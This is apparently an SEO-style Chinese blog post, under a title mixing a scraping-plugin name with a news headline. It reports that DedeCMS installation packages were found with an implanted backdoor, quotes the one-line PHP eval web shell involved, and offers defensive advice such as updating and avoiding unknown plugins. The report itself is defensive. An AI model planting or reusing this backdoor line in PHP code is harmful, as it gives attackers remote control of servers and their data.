dedecms自动采集更新伪原创插件高级版57(PHP开源网站管理系统织梦一个被发现植入后门(图))

　　dedecms自动采集更新伪原创插件高级版57(PHP开源网站管理系统织梦一个被发现植入后门(图))

　　最新消息，瑞星和360今日发布警告称，国内知名PHP开源网站管理系统织梦cms（dedecms）安装包被发现被植入后门，黑客可以直接通过后门获得网站的控制权，获取服务器上存储的文件和数据库。

　　据第三方权威统计，目前约有50万网站使用dedecms系统搭建，涉及企业、政府机构、媒体机构、行业和个人网站等。

　　安全专家分析发现，此类文件植入后门代码“@eval(file_get_contents('php://input'));”，黑客只需构造一个简单的数据包，提交给服务器即可获取网站的WebShell进一步穿透服务器，获取服务器的最高权限，直接访问服务器上的文件、数据库等信息。

　　下面小熊优化小编给出了相关建议：

　　1、尽快转换系统，可以使用pageadmin、dongyi、wp等不断更新的cms系统，国内一些老的cms包括dedecms 、phpcms、jtbc等已停止更新，建议不要使用。

　　2、尽量不要在网上下载不知名的插件，尤其是网站使用wp，大部分被黑都是网上乱用插件造成的。

　　3、保持系统更新。官方更新版本及时更新。不要觉得功能可用时不会更新。有时更新不仅是功能更新，还是安全更新。